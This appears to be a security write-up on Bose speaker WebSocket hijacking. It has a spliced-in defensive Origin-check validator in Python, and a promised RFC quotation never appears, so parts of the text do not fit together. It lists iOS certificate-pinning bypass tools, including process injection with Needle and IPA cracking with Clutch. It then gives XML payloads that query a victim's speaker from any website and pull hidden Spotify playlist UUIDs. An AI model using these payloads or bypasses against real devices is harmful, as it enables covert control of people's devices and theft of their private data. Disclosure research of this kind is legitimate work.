The WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in to communications from that code. The security model used for this is the origin-based security model commonly used by web browsers.
## Websocket 101
- Starts with an HTTP handshake
- Data frames don't have HTTP overhead
- Data frames don't have HTTP security
- No headers, cookies, authentication
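Because the only HTTP headers a WebSocket server ever sees are the ones on the upgrade request, the handshake is the one place where the origin-based security model can be enforced. The following is an added example (not code from the original post or from Bose): a minimal handshake validator, using only the Python standard library, that accepts the upgrade only when the browser-supplied `Origin` header is on an allowlist and otherwise answers 403. The allowlist entry `https://app.example.com`, the host name `speaker.local` and the sample requests are constructed values; the `Sec-WebSocket-Key` is the one used in RFC 6455's own example, so the computed `Sec-WebSocket-Accept` can be checked against the RFC.

```python
import base64
import hashlib

# GUID fixed by RFC 6455 for computing Sec-WebSocket-Accept.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

# Assumed allowlist of page origins allowed to open a socket (constructed value).
ALLOWED_ORIGINS = {"https://app.example.com"}


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (request line, lowercased header dict)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def accept_key(client_key: str) -> str:
    """Sec-WebSocket-Accept = base64(sha1(client key + GUID)), RFC 6455 section 4.2.2."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def handshake(raw_request: str, allowed_origins=ALLOWED_ORIGINS):
    """Return (status code, response text) for a WebSocket upgrade request.

    After the 101 response the server sees only data frames, which carry no
    headers or cookies, so the Origin decision taken here is the only
    origin check the connection will ever get. A browser always sends
    Origin; a missing or foreign Origin therefore means the request did not
    come from one of our own pages and is refused before any upgrade.
    """
    request_line, h = parse_request(raw_request)
    if not request_line.startswith("GET "):
        return 405, "HTTP/1.1 405 Method Not Allowed\r\n\r\n"
    if (h.get("upgrade", "").lower() != "websocket"
            or "upgrade" not in h.get("connection", "").lower()):
        return 400, "HTTP/1.1 400 Bad Request\r\n\r\n"
    key = h.get("sec-websocket-key")
    if not key:
        return 400, "HTTP/1.1 400 Bad Request\r\n\r\n"
    if h.get("origin") not in allowed_origins:
        # Cross-site page (or no browser Origin at all): do not upgrade.
        return 403, "HTTP/1.1 403 Forbidden\r\n\r\n"
    response = (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {accept_key(key)}\r\n\r\n"
    )
    return 101, response


# Constructed sample upgrade requests; the key is the RFC 6455 example key.
_COMMON = (
    "Host: speaker.local\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
)
SAME_ORIGIN_REQUEST = "GET /ws HTTP/1.1\r\n" + _COMMON + "Origin: https://app.example.com\r\n\r\n"
CROSS_SITE_REQUEST = "GET /ws HTTP/1.1\r\n" + _COMMON + "Origin: https://other.example.net\r\n\r\n"
NO_ORIGIN_REQUEST = "GET /ws HTTP/1.1\r\n" + _COMMON + "\r\n"

if __name__ == "__main__":
    for name, req in [("same-origin", SAME_ORIGIN_REQUEST),
                      ("cross-site", CROSS_SITE_REQUEST),
                      ("no-origin", NO_ORIGIN_REQUEST)]:
        status, _ = handshake(req)
        print(f"{name}: {status}")
```

The Origin check only protects against browsers, which are the clients that attach `Origin` honestly; a non-browser client can send any value, so a device that must also refuse connections from arbitrary programs on the network needs an additional authentication secret presented at the handshake (for example a token in the upgrade request) and bound to the accepted connection, since later frames cannot carry one.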
Here's something interesting from the RFC:
To understand the communication between the speaker and the app, we need to remove the TLS certificate pinning that is embedded in the app itself. One of the easiest ways worth trying on a jailbroken iOS device is: https://github.com/nabla-c0d3/ssl-kill-switch2
This approach didn't work for me. There are a number of ways to decrypt iOS app traffic.
- The first is a basic Burp Suite setup.
- The second is to set up Burp Suite with a proxy in the iOS app.
- A third way might be to use mitmproxy.
- A fourth way is to use Burp Mobile Assistant.
- A fifth way is to use Burp with a VPN.
- The last way, which actually works, is to use an IPA crack -> Clutch 2.0
One of the most commonly suggested easy ways is to use Needle: https://github.com/mwrlabs/needle. With Needle you can easily load modules into the running process, i.e. the iOS app. In my case I used a modified version of the cert-pinning bypass module and injected it into the process to intercept all requests and understand the flow of information.
Here's a quick demo of remotely controlling a BOSE device from any internet website a victim might be browsing.
Here are some of the payloads used to retrieve information and to look out for open devices over the internet.
Get all sources:
```xml
<msg><header deviceID="EC24B8A7C786" url="sources" method="GET"><request requestID="6"><info type="new"/></request></header></msg>
```
Get now playing:
```xml
<msg><header deviceID="EC24B8A7C786" url="now_playing" method="GET"><request requestID="11"><info type="new"/></request></header></msg>
```
Steal UUID of hidden Spotify playlists:
```xml
<msg><header deviceID="EC24B8A7C786" url="navigate" method="POST"><request requestID="165"><info mainNode="navigateMenu" type="update"/><sourceItem source="RECENTS"/></request></header><body><navigate menu="recents"/></body></msg>
```